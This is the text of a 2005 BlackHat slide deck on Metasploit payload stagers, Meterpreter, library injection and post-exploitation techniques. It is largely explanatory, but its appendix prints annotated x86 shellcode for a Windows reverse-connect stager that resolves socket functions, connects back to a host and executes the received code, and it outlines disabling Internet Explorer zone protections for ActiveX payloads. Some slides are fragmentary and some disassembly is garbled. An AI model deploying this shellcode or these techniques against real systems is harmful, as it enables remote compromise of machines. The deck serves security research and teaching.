Beyond EIP

spoonm & skape

BlackHat, 2005

Part I

Introduction

Who are we?

- spoonm
 - Full-time student
 - Metasploit developer since late 2003
- skape
 - Lead software developer by day
 - Independent security researcher by night
 - Joined the Metasploit project in 2004

What will we discuss?

- Payload stagers
 - Windows Ordinal Stagers
 - PassiveX

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- Payload stages
 - Library Injection
 - ▶ The Meterpreter
 - DispatchNinja
- Post-exploitation suites
 - Very hot area of research for the Metasploit team
 - Suites built off of advanced payload research
 - Client-side APIs create uniform automation interfaces
 - Primary focus of Metasploit 3.0

Background: the exploitation cycle

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- Post-exploitation Manipulating the target
 - Command shell redirection
 - Arbitrary command execution
 - Pivoting
 - Advanced payload interaction

Part II

Exploitation Technology's State of Affairs

Payload encoders

- Robust and elegant encoders do exist
 - SkyLined's Alpha2 x86 alphanumeric encoder
 - Spoonm's high-permutation Shikata Ga Nai

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- Payload encoders generally taken for granted
 - Most encoders use a static decoder stub
 - Makes NIDS signatures easy to write

NOP generators

- NOP generation hasn't publicly changed much
 - Most PoC exploits use predictable single-byte NOPs (0x90), if any
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- Metasploit 2.4 released with a wide-distribution multi-byte x86 NOP generator (Opty2)

Exploitation techniques

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 - Linux/BSD/Solaris techniques are largely unchanged
 - Windows heap overflows can be made more reliable (Oded/Shok)
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- ...so we wont be talking about them

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 - Port-bind command shell
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- Nearly all PoC exploits use standard payloads
- Command shells have poor automation support
 - Platform dependent intrinsic commands and scripting
 - Reliant on the set of applications installed on the machine
 - Hindered by chroot jails and host-based ACLs

"Advantage" payloads

- Advantage payloads provide enhanced manipulation of hosts, commonly through the native API
- Help to reduce the tediousness of writing payloads
- Core ST's InlineEgg

Part III

Payload Stagers

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- The three steps make it so stages are connection method independent
 - No need to have command shell payloads for reverse, portbind, and findsock

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- Eliminate the need to re-implement payloads for each connection method
- Provide an abstract way for getting arbitrary code onto a remote machine through any medium

Windows ordinal stagers

- Technique from Oded's lightning talk at core04
- ▶ Uses static ordinals in ₩S2_32.DLL to locate symbol addresses
- Compatible with all versions of Windows (including 9X)
- Results in very low-overhead symbol resolution
- Facilitates implementation of reverse, portbind, and findsock stagers
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- Very few PE files use known-static ordinals, but WS2_32.DLL is one that does
 - ▶ 30 symbols use static ordinals in WS2_32.DLL

- ▶ Locate the base address of WS2_32.DLL
 - Extract the Peb->Ldr pointer
 - Extract Flink from the InInitOrderModuleList
 - Loop through loaded modules comparing module names
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- ▶ Requires that ws2_32. DLL already be loaded in the target process

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- Automatically uses proxy settings defined in Internet Explorer
- Bypasses trusted application restrictions (ZoneAlarm)
- ActiveX technology allows the attacker to implement complex code in higher level languages (C, C++, VB)
 - Eliminates the need to perform complicated tasks from assembly
 - ActiveX controls are functionally equivalent to executables

Implementing the PassiveX stager

- Enable download and execution of ActiveX controls
 - Open the current user's Internet zone registry key
 - Enable four settings
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- Launch a hidden instance of Internet Explorer pointed at a URL the attacker controls
- Internet Explorer then loads and executes the attacker's ActiveX control

An example ActiveX control

- ActiveX controls may choose to build an HTTP tunnel to the attacker
- HTTP tunnels provide a streaming connection over HTTP requests and responses
- Useful for tunneling other protocols, like TCP, through HTTP

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- Requires the ActiveX control to restore Internet zone settings
 - May leave the machine vulnerable to compromise if not done

Payload Stages

Part IV

What are payload stages?

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- Some examples of payload stages include
 - Execute a command shell and redirect IO to the attacker
 - Execute an arbitrary command
 - Download an executable from a URL and execute it

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Types of library injection

- Three primary methods exist to inject a library
 - On-Disk: loading a library from the target's harddrive or a file share
 - 2. **In-Memory**: loading a library entirely from memory
 - ActiveX: loading a library through Internet Explorer's ActiveX support
- On-Disk and In-Memory techniques are conceptually portable to non-Windows platforms

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- On-Disk injection subject to filtering by Antivirus due to filesystem access
- Requires that the library file exist on the target's harddrive or that the file share be reachable

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- Once hooked, calling LoadLibraryA with a unique pseudo file name is all that's needed

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- Extremely useful when illustrating security weaknesses
- Suits understand mouse movement much better than command lines

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 - Extension-based architecture makes Meterpreter completely flexible
- Use of in-memory library injection makes it possible to run in a stealth fashion

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- Clients on one platform should work with servers on another

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- TLVs make packet parsing simplistic and flexible
 - No formatting knowledge is required to parse the packet outside of the TLV structure

Core client/server interface

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- Implements basic packet transmission and dispatching
- Exposes channel allocation and management to extensions
- Also includes support for migrating the server to another running process

Meterpreter extensions in action: Stdapi

Cool dN stuff here

Part V

Post-Exploitation Suites



Part VI

Conclusion

Reference Material

Payload Stagers

- Windows Ordinal Stagers http://www.metasploit.com/users/spoonm/ordinals.txt
- ► PassiveX
 http://www.uninformed.org/?v=1&a=3&t=sumry

Payload Stages

Library Injection

```
http://www.nologin.org/Downloads/Papers/remote-library-injection.pdf
```

Meterpreter

```
http:
```

//www.nologin.org/Downloads/Papers/meterpreter.pdf

Part VII

Appendix

Part VIII

Appendix: Payload Stagers

Locating WS2_32.DLL's base address

```
cld
FC
                                ; clear direction (lodsd)
31DB
          xor ebx,ebx
                             ; zero ebx
          mov eax, [fs:ebx+0x30]; eax = PEB
648B4330
8B400C
          mov eax, [eax+0xc]; eax = PEB->Ldr
8B501C
          mov edx,[eax+0x1c] ; edx = Ldr->InitList.Flink
          mov edx.[edx] ; edx = LdrModule->Flink
8B12
8B7220
          mov esi,[edx+0x20]
                               ; esi = LdrModule->DllName
                                ; eax = [esi] ; esi += 4
AD
          lodsd
          lodsd
AD
                                ; eax = [esi] ; esi += 4
          dec esi
4E
                                ; esi--
          add eax.[esi]
                               ; eax = eax + [esi]
0306
                                ; (4byte unicode->ANSI)
3D32335F32 cmp eax, 0x325f3332
                               i = 2 32?
75EF
          inz 0xd
                                ; not equal, continue loop
```

Resolve symbols using static ordinals

```
80A3A8
         8B453C
         mov eax,[ebp+0x3c] ; eax = DosHdr->e_lfanew
8B4C0578
         mov ecx, [ebp+eax+0x78]; ecx = Export Directory
         mov ecx,[ebp+ecx+0x1c]; ecx = Address Table Rva
8B4C0D1C
                           ; ecx += ws2base
01E9
         add ecx, ebp
8B4158
         mov eax,[ecx+0x58]
                           ; eax = socket rva
01E8
         add eax,ebp
                           i = ax += ws2base
8B713C
         mov esi,[ecx+0x3c] ; esi = recv rva
01EE
         add esi,ebp ; esi += ws2base
         add ebp, [ecx+0xc]
03690C
                           ; ebp += connect rva
```

Create the socket, connect back, recv, and jump

```
; Use chained call-stacks to save space
; connect returns to recy returns to buffer (fd in edi)
53
           push ebx
                                  ; push 0
6A01
           push byte +0x1
                                  ; push SOCK_STREAM
6A02
           push byte +0x2
                                  ; push AF INET
OCTT
           call eax
                                  ; call socket
97
         xchq eax,edi
                              ; edi = fd
687F000001 push dword 0x100007f ; push sockaddr in
68020010E1 push dword 0xe1100002
89E1
           mov ecx, esp
                                  ; ecx = &sockaddr in
53
           push ebx
                                  ; push flags (0)
B70C
           mov bh,0xc
                                  i = 0 \times 0 \times 0 \times 0
53
           push ebx
                                  ; push length (0xc00)
51
           push ecx
                                  ; push buffer
57
           push edi
                                  ; push fd
51
           push ecx
                                  ; push buffer
6A10
           push byte +0x10
                                  ; push addrlen (16)
51
           push ecx
                                  ; push &sockaddr in
57
                                  ; push fd
           push edi
56
           push esi
                                  ; push recv
FFE5
           imp ebp
                                  ; call connect
```